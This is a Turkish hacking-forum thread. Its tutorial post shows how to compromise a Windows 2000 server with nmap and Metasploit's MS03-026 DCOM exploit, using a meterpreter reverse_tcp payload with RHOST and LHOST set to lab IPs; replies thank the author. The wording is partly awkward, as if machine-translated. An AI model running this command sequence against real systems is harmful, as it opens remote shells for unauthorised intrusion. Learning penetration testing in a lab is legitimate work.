THT DUYURU

chat
Linux Linux İle İlgili Bilgi Paylaşım Platformu

takipci
chat
Seçenekler

Mεtasploit ile Windows Server Pentest ~ #ATABÖRÜ // #Stajyer Asistan Kulubü#

ATABÖRÜ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
Ötüken
Yaş:
83
Mesajlar:
3.366
Konular:
303
Teşekkür (Etti):
934
Teşekkür (Aldı):
894
Ticaret:
(0) %
19
2399
08-06-2018 00:17
#1
Arrow
Mεtasploit ile Windows Server Pentest ~ #ATABÖRÜ // #Stajyer Asistan Kulubü#

Merhaba, arkadaşlar bu konumda sizlere Msfconsole ile Windows Server pentest yapmayı göstereceğim şimdi hemen geçelim :


Bu iş için "N-map" adlı programı kullanacağız İlk öncelikle Nmap nedir biraz ondan bahsedelim :


Fyodor tarafından üretilmiştir. Tamamen özgür bir yazılım olup, hem Windows‘ta hem Linux‘ta hem MacOS‘ta kullanılabilir.

Nmap‘in en genel kullanımı sızma testleri üzerinedir. İlk yapılacak iş ipconfig,ifconfig,iwconfig komutları gibi komutlarla IP adresi öğrenilir. Daha sonra nmap taramasına bırakılır ve nmap kısa bir zaman içinde size hangi portların açık olduğu veya filtreli olduğu, aramanıza göre kullanılan donanım yazılım bilgilerinin versiyon numaralarına kadar listeleyecektir.


Peki, "N-map" toolunu biraz tandığımıza göre, gelelim hangi dil ile yazıldığına arkadaşlar "N-map" hangi dil ile yazıldı C, C++, Python, Lua bu diller kullanılmıştır.


Şimdi, "N-map" tool adlı programı tanıdığımza göre şimdi gelelim yapılışına :


Şimdi arkadaşlar, Uzak sunucu hakkında bize sağlanan tek şey, sadece bilgi. bir Windows 2000 Server olmasıdır ve Hedef, bu uzak sunucunun kabuk erişimini elde etmektir. İlk adım, en popüler port tarama aracı olan "Nmap'ın" adlı tool'un yardımıyla uzak sunucuda tarama yapabileceğiz.

Örnek Uzak sunucunun Nmap taramasını gerçekleştirin, örn. 192.168.220.141





Evet, arkadaşlar Biz burada ne olduğunu fark ettik. ? "135" portu açık. İşimiz daha kolaylaştı Bu nedenle, eğer bu sunucu savunmasız ise, Kabuk erişimindeki betikleri kullanabilir ve kabuk erişimini kazanabiliriz.


Şimdi arkadaşlar burda bize yardımcı olacak tool "Msfconsole" Peki biz bunu nasıl açacağız

M3tasploit Framework'ü terminalinize “ msfconsole ” şeklinde yazarak da açabilirsiniz bu size kalmış bişey. Msfconsole başlatılması sırasında, standart kontroller yapılır. Her şey yolunda giderse ekran görüntüsünü aşağıdaki ekran görüntüsünde göreceğiz.





Şimdi, 135 numaralı bağlantı noktasının açık olduğunu biliyoruz, nerden biliyoruz, Dostlar Çünkü yukarıda belirmiştim. M3tasploit'te ilgili bir RPC istismarını araştırıyoruz. ****sploit tarafından desteklenen tüm istismarları listelemek için “ show exploits ” komutunu kullanıyoruz. Bu istismar, şu anda mevcut olan tüm açıkları listeler.





Fark etmiş olabileceğiniz gibi, M3tasploit Framework'ün varsayılan kurulumu oldukça etkileyici bir stoklama olan 1682 exploit ve 498 yük ile birlikte geliyor , bu nedenle bu büyük listeden özel bir istismar bulmak gerçekten can sıkıcı bir iş olacaktır yani biz burada biraz uğraşacağız. ama olsun öğrenmek güzeldir. Yani, daha iyi bir seçenek kullanıyoruz.


Msfconsole arayzünde “ arama dcerpc ” seçeneğinde bize sunulanacak. o msfconsole pencerede sunulacak bir savunmasız noktası 135'e ilgili tüm patlatır listesi ile sunucuya erişmek için kullanılabilir istismar olarak anahtar kelimeyi dcerpc ile ilgili tüm patlatır aramak için.





Evet arlkadaşlar, Şimdi bi rahatladık. Artık önünüzde rpc açıklamasının önümüze çıkmış bir listesi var, aslında biz kullanmadan önce istismar hakkında daha fazla bilgiye ihtiyacımız var. İstisna ile ilgili daha fazla bilgi almak için , mevcut hedefler, istismar şartları, savunmasızlığın detayları ve hatta daha fazla bilgiyi bulabileceğiniz referanslar gibi bilgiler sağlayan “ exploit / windows / dcerpc / ms03_026_dcom ” komutunu kullanabilirsiniz .





Aynı ekranda gösterdiğim gibi. (:


Şimdi gelelim Komutu “kullanımına” istismar için istismar ortamı harekete geçirir. Bizim durumumuzda, istismarımızı aktive etmek için “ exploit / windows / dcerpc / ms03_026_dcom ” komutunu kullanacağız aynı ekranda gösterdiğim gibi .





Evet, arkadaşlar şimdi Yukarıdaki ekran görüntüsünden, ms03_026_dcom açıklamasının kullanılmasından sonra komut isteminin “ msf> ” den “ msf exploit (ms03_026_dcom)> ” olarak değiştiğine dikkat çekilir , bu da bu istismarın geçici bir ortamına girdiğimizi gösterir yani temiz bir ortama çekildiğimizi gösterir.

Şimdi, mevcut senaryonun ihtiyacına göre sömürüyü yapılandırmamız gerekiyor. “ Show options ” komutunu yazarak bir bakalım ayarlarımız olmuşmu. ? istismarın düzgün bir şekilde başlatılması için gerekli olan çeşitli parametreleri gösterir.





Evet arkadaşlar Şimdi, Bizim örneğimizde, RPORT zaten 135 olarak ayarlanmış ve ayarlanacak tek seçenek “ set RHOST ” komutu kullanılarak ayarlanabilen RHOST'dur .

komutu girin RHOST 192.168.220.141 set ” ve biz RHOST olarak ayarlanır görüyoruz bu şekilde 192.168.220.14





Şu an kullanıma sunduğumuz tek adım, istismarın yükünü ayarlıyor. Kullanılabilir tüm yükleri “ showpayloads ” komutunu kullanarak görüntüleyebiliriz . Aşağıdaki ekran görüntüsünde gösterildiği gibi, “ showpayloads ” komutu seçilen istisna ile uyumlu olan tüm yükleri listeleyecektir.





Şimdi, Bizim durumumuzda, uzak sunucu başarılı bir şekilde kullanıldığında bir kabuk oluşturan “ PAYLOAD windows / meterpreter / reverse_tcp ” komutunu kullanarak ayarlanabilen ters tcp ölçüm aygıtını kullanıyoruz .



Evet... Dışarıdan yük için LHOST'un ayarlanmadığını fark ettik, bu yüzden “ set LHOST 192.168.220.135 “ komutunu kullanarak yerel IP yani 192.168.220.135'i ayarladık .





Evet, arkadaşlar şimdi, Artık her şeyin hazır olduğu ve istismarın doğru bir şekilde yapılandırıldığı için, istismarın başlatılması zamanı geldi.

“ Exploit ” komutu aslında uzak sistemde çalıştırılan yükü çalıştırmak için ne gerekiyorsa yapması gereken saldırıyı başlatır.





Şimdi gelelim, Yukarıdaki ekran görüntüsüne, güvenlik açığından etkilenen bağlantı noktası 135 nedeniyle uzaktan kumandanın 192.168.220.141 numaralı telefonuna karşı başarılı bir şekilde yürütüldüğünü göstermektedir. Bu durum, " sayaç yorumlayıcı" 'ya geçmeden değişiklikle belirtilir .

Artık kurban ile bizim makinemiz arasında bir ters bağlantı kurulduğuna göre, sunucunun tam kontrolüne sahibiz.

Aşağıdaki ekran görüntüsünde görüntülenen ilgili eylemleri gerçekleştirmek için uzak sunucuda tüm komutların bizim tarafımızdan kullanılabileceğini görmek için “ help ” komutunu kullanabiliriz.





Evet, arkadaşlar gecenin yarısında sahuru beklerken konu açıyım dedim ve sizinle eylendim...

Bir teşekkürü çok görmeyin

İyi forumlar...

Not : Eleştirmeyi unutmayın...
---------------------
Ey Türk milleti! Kendine dön! Sen yükseltmiş Bilge Kağan'ına, hür ve müstakil ülkene karşı hata ettin, kötü duruma düşürdün. Milletin adı, sanı yok olmasın diye Türk milleti için gece uyumadım, gündüz oturmadım. Kardeşim Kül Tegin ve iki şad ile ölesiye bitesiye çalıştım.
Konu ATABÖRÜ tarafından (08-06-2018 00:59 Saat 00:59 ) değiştirilmiştir.
CyberXhackk - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2016
Nereden:
#include<>
Mesajlar:
3.077
Konular:
244
Teşekkür (Etti):
841
Teşekkür (Aldı):
791
Ticaret:
(0) %
08-06-2018 00:26
#2
Güzel anlatım ellerine sağlık aboneliğe ekledim (:
--------------------- Linux'a Dair Herşey..
ATABÖRÜ Teşekkür etti.
HeRTeS - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
Mars
Mesajlar:
1.857
Konular:
192
Teşekkür (Etti):
266
Teşekkür (Aldı):
621
Ticaret:
(0) %
08-06-2018 00:26
#3
Eline Sağlık. Konun güzel olmuş.
---------------------
.-.*/-.*/-*./-56842-*-s-*98ss8
NoteBox - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2017
Nereden:
Uzay Teşikat
Yaş:
17
Mesajlar:
1.781
Konular:
219
Teşekkür (Etti):
370
Teşekkür (Aldı):
332
Ticaret:
(0) %
08-06-2018 00:27
#4
Ellerine sağlık lazım olur bana bir gün
---------------------
Why?
Sosyal Mühendislik,Windows,Cra1king, Android İşletim Sistemleri, Sosyal Medya Güvenliği, PC /Mail Güvenliği,Trojan ve Virüsler,Bilgisayar Güvenliği,Kişisel Gelişim, İlişkiler, Araştırmacı
ATABÖRÜ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
Ötüken
Yaş:
83
Mesajlar:
3.366
Konular:
303
Teşekkür (Etti):
934
Teşekkür (Aldı):
894
Ticaret:
(0) %
08-06-2018 00:34
#5
Alıntı:
CyberXhackk´isimli üyeden Alıntı Mesajı göster
Güzel anlatım ellerine sağlık aboneliğe ekledim (:
Alıntı:
NoteBox´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık lazım olur bana bir gün
Alıntı:
HeRTeS´isimli üyeden Alıntı Mesajı göster
Eline Sağlık. Konun güzel olmuş.
Hepinize, teker teker teşekkür ederim arkadaşlar.
---------------------
Ey Türk milleti! Kendine dön! Sen yükseltmiş Bilge Kağan'ına, hür ve müstakil ülkene karşı hata ettin, kötü duruma düşürdün. Milletin adı, sanı yok olmasın diye Türk milleti için gece uyumadım, gündüz oturmadım. Kardeşim Kül Tegin ve iki şad ile ölesiye bitesiye çalıştım.
ATABÖRÜ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
Ötüken
Yaş:
83
Mesajlar:
3.366
Konular:
303
Teşekkür (Etti):
934
Teşekkür (Aldı):
894
Ticaret:
(0) %
08-06-2018 01:17
#6
Güncel ++
---------------------
Ey Türk milleti! Kendine dön! Sen yükseltmiş Bilge Kağan'ına, hür ve müstakil ülkene karşı hata ettin, kötü duruma düşürdün. Milletin adı, sanı yok olmasın diye Türk milleti için gece uyumadım, gündüz oturmadım. Kardeşim Kül Tegin ve iki şad ile ölesiye bitesiye çalıştım.
Ataerimz - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2018
Nereden:
Guadalajara
Mesajlar:
507
Konular:
39
Teşekkür (Etti):
21
Teşekkür (Aldı):
64
Ticaret:
(0) %
08-06-2018 09:36
#7
Teşekkürler güzel anlattıniz, elinize sağlık.
SeNZeRo - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
09/2016
Mesajlar:
5.076
Konular:
476
Teşekkür (Etti):
101
Teşekkür (Aldı):
1704
Ticaret:
(0) %
09-06-2018 03:47
#8
Eline emeğine sağlık.
Daedalus - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2015
Mesajlar:
215
Konular:
19
Teşekkür (Etti):
43
Teşekkür (Aldı):
17
Ticaret:
(0) %
09-06-2018 03:59
#9
Aklımda bu ****sploit ile ilgili hep ufak tefek sorular kalmıştı az önce bir video izledim ve üzerinede bu yazıyı okuyunca o sorular gitti açıkçası , öönceden araştırdığımda hep program ile hackleme çıkıyordu exploiti seçip exe yapıyoruz vs. exe veya dosya atamdan port ile bu şekilde sızılabiliyormuş konu gerçekten yararlı teşekkürler
--------------------- if (dev.isBored() || job.sucks()) {
searchJobs({flexibleHours: True, companyCulture: 100});

}
ATABÖRÜ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
Ötüken
Yaş:
83
Mesajlar:
3.366
Konular:
303
Teşekkür (Etti):
934
Teşekkür (Aldı):
894
Ticaret:
(0) %
13-07-2018 20:20
#10
Güncel +++ Arkadaşlar Konu Güncel Kalsınki Size Bişeyler Öğretebilelim. Hem Öğrenelim, Hem Öğretelim Amaç Bu.
---------------------
Ey Türk milleti! Kendine dön! Sen yükseltmiş Bilge Kağan'ına, hür ve müstakil ülkene karşı hata ettin, kötü duruma düşürdün. Milletin adı, sanı yok olmasın diye Türk milleti için gece uyumadım, gündüz oturmadım. Kardeşim Kül Tegin ve iki şad ile ölesiye bitesiye çalıştım.
Konu ATABÖRÜ tarafından (13-07-2018 20:26 Saat 20:26 ) değiştirilmiştir.
M3m0ry Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler